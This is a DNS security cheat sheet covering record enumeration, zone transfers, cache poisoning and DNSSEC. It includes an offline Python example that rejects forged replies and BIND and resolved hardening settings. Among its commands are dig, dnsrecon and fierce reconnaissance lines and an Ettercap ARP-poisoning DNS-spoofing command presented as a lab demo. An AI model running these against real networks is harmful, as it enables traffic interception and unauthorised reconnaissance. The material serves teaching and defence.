DNS protocol attacks, record enumeration, spoofing/cache poisoning, and protection with DNSSEC.
```bash
# Record enumeration
dig target.com ANY   # All record types (many authoritative servers now refuse ANY, RFC 8482)
dig target.com MX    # Mail servers
dig target.com NS    # Name servers
dig target.com TXT   # SPF, DKIM, DMARC records
# Zone transfer (if misconfigured, reveals ALL records):
dig axfr @ns1.target.com target.com
# Subdomain brute force:
dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt
fierce --domain target.com
```
An attacker injects forged DNS responses into a resolver's cache so that clients are redirected to malicious servers; the forged reply is only cached if it matches the outstanding query (transaction ID, source port, question).
```bash
# Lab demo with Ettercap: add the spoofed record to /etc/ettercap/etter.dns:
#   *.target.com A 192.168.1.100
ettercap -T -q -P dns_spoof -M arp /192.168.1.1// /192.168.1.10//
```
```bash
dig +dnssec target.com      # Check if DNSSEC is active (RRSIG records in the answer)
dig DS target.com @8.8.8.8  # Check DS record at the parent (delegation signer)
delv target.com             # Verify the chain of trust from the root down
# "ad" flag in the response header = authenticated data (the resolver validated DNSSEC)
```
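The two checks that tie the cache-poisoning and DNSSEC sections together are what a resolver does before it caches a reply: the answer must match the outstanding query (same destination port as the query's randomised source port, same 16-bit transaction ID, same question), and the AD flag that `dig` prints as `ad` is just bit 5 of the header flags. The following added example (not part of the original page, stdlib only, no network) builds a DO-bit query and two candidate replies by hand, rejects the forged one, and reads the AD flag. All packets, the port 40000 and the addresses 192.0.2.10 and 192.168.1.100 are constructed for the demo.

```python
"""Checks a resolver performs before accepting a DNS answer, exercised offline.

Added example: packets are constructed by hand so that matching of port,
transaction ID and question (what defeats forged replies) and the DNSSEC AD
flag can be shown without a network.
"""
import struct
from dataclasses import dataclass

FLAG_QR = 0x8000   # header flag: this packet is a response
FLAG_AD = 0x0020   # header flag: authenticated data (resolver validated DNSSEC)
TYPE_A, TYPE_OPT, CLASS_IN = 1, 41, 1


@dataclass
class Header:
    txid: int
    flags: int
    qdcount: int
    ancount: int
    nscount: int
    arcount: int


def encode_name(name: str) -> bytes:
    """Wire-format a domain name: length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode a (possibly compressed) name; returns (name, offset just after it)."""
    labels, end = [], None
    while True:
        ln = buf[off]
        if ln & 0xC0 == 0xC0:               # compression pointer to an earlier name
            if end is None:
                end = off + 2
            off = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels).lower(), (end if end is not None else off)


def parse_header(pkt: bytes) -> Header:
    return Header(*struct.unpack("!HHHHHH", pkt[:12]))


def parse_question(pkt: bytes):
    """(name, qtype, qclass) of the first question."""
    name, off = decode_name(pkt, 12)
    return (name,) + struct.unpack("!HH", pkt[off:off + 4])


def build_query(txid: int, name: str, qtype: int, dnssec_ok: bool = False) -> bytes:
    """Standard query with RD set; with dnssec_ok an OPT RR carrying the DO bit is appended."""
    pkt = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, int(dnssec_ok))
    pkt += encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    if dnssec_ok:  # OPT RR: root name, type 41, UDP size 4096, DO bit in the TTL field, no rdata
        pkt += b"\x00" + struct.pack("!HHIH", TYPE_OPT, 4096, 0x00008000, 0)
    return pkt


def build_response(txid: int, name: str, ip: str, flags: int = 0x8180) -> bytes:
    """One A-record answer; the RR name is a compression pointer to the question at offset 12."""
    pkt = struct.pack("!HHHHHH", txid, flags, 1, 1, 0, 0)
    pkt += encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)
    pkt += b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4)
    return pkt + bytes(int(o) for o in ip.split("."))


def parse_answers(pkt: bytes):
    """Return [(name, type, ttl, rdata)] from the answer section; A rdata is rendered dotted."""
    h, off = parse_header(pkt), 12
    for _ in range(h.qdcount):
        off = decode_name(pkt, off)[1] + 4      # skip name plus qtype/qclass
    answers = []
    for _ in range(h.ancount):
        name, off = decode_name(pkt, off)
        rtype, _cls, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        rdata = pkt[off + 10:off + 10 + rdlen]
        off += 10 + rdlen
        if rtype == TYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return answers


def validate_response(query: bytes, query_src_port: int, response: bytes, response_dst_port: int):
    """Accept a reply only if it matches the outstanding query on port, TXID and question.

    A spoofer who cannot see the query has to guess both the 16-bit TXID and the
    randomised source port; a mismatch on either is dropped before anything is cached.
    """
    qh, rh = parse_header(query), parse_header(response)
    if response_dst_port != query_src_port:
        return False, "port mismatch"
    if rh.txid != qh.txid:
        return False, "txid mismatch"
    if not rh.flags & FLAG_QR:
        return False, "not a response"
    if rh.qdcount != 1 or parse_question(response) != parse_question(query):
        return False, "question mismatch"
    return True, "ok"


def authenticated(response: bytes) -> bool:
    """True when the validating resolver set the AD flag (what dig shows as 'ad')."""
    return bool(parse_header(response).flags & FLAG_AD)


if __name__ == "__main__":
    # Constructed demo: a DO-bit query sent from port 40000 and two candidate replies.
    q = build_query(0x1234, "target.com", TYPE_A, dnssec_ok=True)
    genuine = build_response(0x1234, "target.com", "192.0.2.10", flags=0x81A0)  # QR RD RA AD
    forged = build_response(0x0001, "target.com", "192.168.1.100")             # guessed TXID
    for label, resp in (("genuine", genuine), ("forged", forged)):
        ok, why = validate_response(q, 40000, resp, 40000)
        print(f"{label}: accepted={ok} ({why}) ad={authenticated(resp)} answers={parse_answers(resp)}")
```

The AD flag is only meaningful on the path between a validating resolver and its client; it says nothing about DNSSEC if the recursive resolver itself does not validate, which is why `delv` (which validates locally) is the better check for the chain of trust.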
```conf
# BIND: allow zone transfer only to the secondary NS (named.conf excerpt)
zone "target.com" {
    type master;
    file "/etc/bind/zones/db.target.com";   # zone file path is a placeholder
    allow-transfer { 192.168.1.2; };
};
```
```ini
# /etc/systemd/resolved.conf (directives must sit under the [Resolve] section)
[Resolve]
DNS=1.1.1.1 1.0.0.1
DNSOverTLS=yes
```
| Record | Purpose |
|---|---|
| SPF | Defines authorised mail servers for the domain |
| DKIM | Cryptographic signature for outgoing emails |
| DMARC | SPF+DKIM alignment policy and reporting |
| CAA | Limits which CAs can issue certificates for the domain |